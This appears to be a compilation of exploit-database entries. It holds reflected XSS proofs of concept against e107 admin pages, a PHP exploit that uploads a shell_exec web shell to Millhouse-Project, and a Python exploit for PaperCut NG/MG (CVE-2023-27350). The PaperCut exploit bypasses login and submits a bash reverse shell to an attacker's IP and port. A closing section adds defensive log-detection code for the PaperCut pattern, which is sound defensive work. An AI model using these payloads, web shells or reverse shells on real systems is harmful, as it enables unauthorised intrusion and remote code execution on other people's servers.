<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
<p>No HTML5 support.</p>
</div>
[...]

# POC 2

URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: payload in the URL path (PATH_INFO after newspost.php)

Request:

GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close

Response (the request path is reused unescaped in the pagination link's href):

HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>News - List - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"> <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
[...]

thrsrossi Millhouse-Project 1.414 - Remote Code Execution

<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/

$options = getopt('u:c:');
if (!isset($options['u'], $options['c'])) {
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \033[0m\n \n");
}

$target  = $options['u'];
$command = $options['c'];
$url     = $target . '/includes/add_post_sql.php';

// Multipart post body: the "image" part carries a PHP file named rose.php, which
// add_post_sql.php stores under /images/ without checking its type or extension.
// The command to run is baked into the uploaded file itself.
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"

helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"

<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"

1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php

<?php $shell = shell_exec("' . $command . '"); echo $shell; ?>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';

$headers = array(
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
    'Cookie: PHPSESSID=rose1337',
);

// upload the web shell
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);
curl_close($ch);

// execute command: requesting the uploaded file runs the embedded shell_exec();
// the cmd parameter is passed along but rose.php as uploaded does not read it
$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);

echo "\033[1;32m \n" . $exec_shell . "\033[0m\n \n";
?>

PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)

# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
# Date: 13 May 2023
# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350

import argparse

import requests

# Tapestry form submission for Options > User/Group Sync: switches the sync
# source to a CUSTOM program and points both program fields at /usr/bin/python3
Group_payload = {
    "service": "direct/1/OptionsUserSync/$OptionsUserSource.$Form",
    "sp": "S0",
    "Form0": "$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5",
    "$Hidden": "Sf278fd737ffcaed6eb3d1f67c2ba5c6d",
    "$Hidden$0": "F",
    "$Hidden$1": "F",
    "$Hidden$2": "OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.",
    "$Hidden$3": "F",
    "$Hidden$4": "X",
    "$Hidden$5": "X",
    "$Hidden$6": "X",
    "$Hidden$7": "X",
    "$Hidden$8": "X",
    "$Hidden$9": "X",
    "$Hidden$10": "X",
    "$Hidden$11": "X",
    "$Hidden$12": "X",
    "$Hidden$13": "F",
    "$Hidden$14": "X",
    "$Hidden$15": "F",
    "$Hidden$16": "S",
    "$Hidden$17": "S",
    "$Hidden$18": "S",
    "$Hidden$19": "S",
    "$Hidden$20": "F",
    "$Hidden$21": "SSTANDARD_UNIX",
    "$PropertySelection": "3,CUSTOM",
    "$TextField": "/usr/bin/python3",
    "$TextField$0": "/usr/bin/python3",
    "$RadioGroup": "0",
    "primaryCardIdLength": "8",
    "secondaryCardIdLength": "8",
    "$PropertySelection$4": "0,STANDARD_UNIX",
    "$TextField$13": "",
    "$TextField$14": "",
    "$TextField$15": "",
    "$TextField$16": "",
    "$RadioGroup$0": "0",
    "$PropertySelection$5": "NONE",
    "$TextField$17": "",
    "$PropertySelection$6": "NONE",
    "$TextField$18": "employeeNumber",
    "primaryCardId2Length": "8",
    "$PropertySelection$7": "NONE",
    "$TextField$19": "",
    "secondaryCardId2Length": "8",
    "$TextField$20": "",
    "$Submit$4": "Apply",
}

parser = argparse.ArgumentParser(description="Papercut RCE")
parser.add_argument('--url', help='URL of the vulnerable application, e.g. http://10.2.3.4:9191 (no trailing /)')
parser.add_argument('--ip', help='our rev shell ip')
parser.add_argument('--port', help='our rev shell port')
args = parser.parse_args()

url = args.url
ip = args.ip
port = args.port

# Python one-liner submitted as the login password; with the sync program
# switched to python3 above, the login attempt hands it to the interpreter
passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")"

final_payload = {
    "service": "direct/1/Home/$Form$0",
    "sp": "S0",
    "Form0": "$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0",
    "$Hidden$0": "true",
    "$Hidden$1": "X",
    "inputUsername": "help",
    "inputPassword": passwd_input,
    "$PropertySelection$0": "en",
    "$Submit$0": "Log+in",
}

# create a session
session = requests.Session()

# visit the first URL to set up the session: SetupCompleted grants an
# authenticated admin session without credentials (the bypass)
setup_url = url + "/app?service=page/SetupCompleted"
response = session.get(setup_url)
response.raise_for_status()  # check for any errors

# visit the second URL using the same session
dashboard_url = url + "/app?service=page/Dashboard"
response = session.get(dashboard_url)
response.raise_for_status()  # check for any errors

# URL to change the user sync settings
user_group_change_url = url + "/app"
response = session.post(user_group_change_url, data=Group_payload)
response.raise_for_status()  # check for errors

# URL to gain RCE
rce_url = url + "/app"
response = session.post(rce_url, data=final_payload)
response.raise_for_status()  # check for any errors

# print the response text
print(response.text)
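The exploit leaves a distinctive trail: a GET to `/app?service=page/SetupCompleted` from a client that then POSTs to `/app`, and a form body that re-points the user sync source at an interpreter. The following is an added example, written for this page and not part of the exploit or of PaperCut, that turns those two observations into detection logic. The log format (Apache/nginx combined format from a proxy in front of the PaperCut web port) and the sample lines are constructed; PaperCut's own server logs are laid out differently, and the body-level check needs a proxy or WAF that records POST bodies.

```python
"""Detection for the CVE-2023-27350 request pattern over constructed access
log lines. Example code written for this page, not PaperCut's own."""
import re
from datetime import datetime
from urllib.parse import parse_qs

# Combined-log-format line as a reverse proxy would record it (assumption)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

SETUP_PATH = "/app?service=page/SetupCompleted"

# Constructed sample: 203.0.113.5 follows the exploit's request order,
# 198.51.100.7 is an ordinary logged-in admin using the same endpoints.
SAMPLE_LOG = """\
203.0.113.5 - - [13/May/2023:10:15:01 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 302 0
203.0.113.5 - - [13/May/2023:10:15:02 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 5120
203.0.113.5 - - [13/May/2023:10:15:03 +0000] "POST /app HTTP/1.1" 302 0
203.0.113.5 - - [13/May/2023:10:15:04 +0000] "POST /app HTTP/1.1" 200 1300
198.51.100.7 - - [13/May/2023:10:20:00 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 5120
198.51.100.7 - - [13/May/2023:10:20:05 +0000] "POST /app HTTP/1.1" 302 0
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_setup_bypass(log_text, window_seconds=300):
    """Return (ip, setup_time, post_time) for each POST /app that follows a hit
    on SetupCompleted from the same client within the window."""
    last_setup = {}
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "GET" and rec["path"] == SETUP_PATH:
            last_setup[rec["ip"]] = rec["ts"]
        elif rec["method"] == "POST" and rec["path"] == "/app":
            seen = last_setup.get(rec["ip"])
            if seen is not None and (rec["ts"] - seen).total_seconds() <= window_seconds:
                hits.append((rec["ip"], seen, rec["ts"]))
    return hits


def is_sync_program_change(form_body):
    """Body-level indicator: the OptionsUserSync form submitted with the sync
    source set to CUSTOM and an absolute program path, as in Group_payload."""
    fields = parse_qs(form_body)
    service = fields.get("service", [""])[0]
    if not service.startswith("direct/1/OptionsUserSync"):
        return False
    selection = fields.get("$PropertySelection", [""])[0]
    program = fields.get("$TextField", [""])[0]
    return selection.endswith("CUSTOM") and program.startswith("/")


if __name__ == "__main__":
    for ip, t0, t1 in find_setup_bypass(SAMPLE_LOG):
        print(f"{ip}: SetupCompleted at {t0:%H:%M:%S}, POST /app at {t1:%H:%M:%S}")
```

A single GET to SetupCompleted is already worth an alert on a server that finished setup long ago; the correlation with a following POST is what separates a scanner probe from an actual bypass. The body check catches the same activity even when the attacker already holds a real admin session and skips the bypass step.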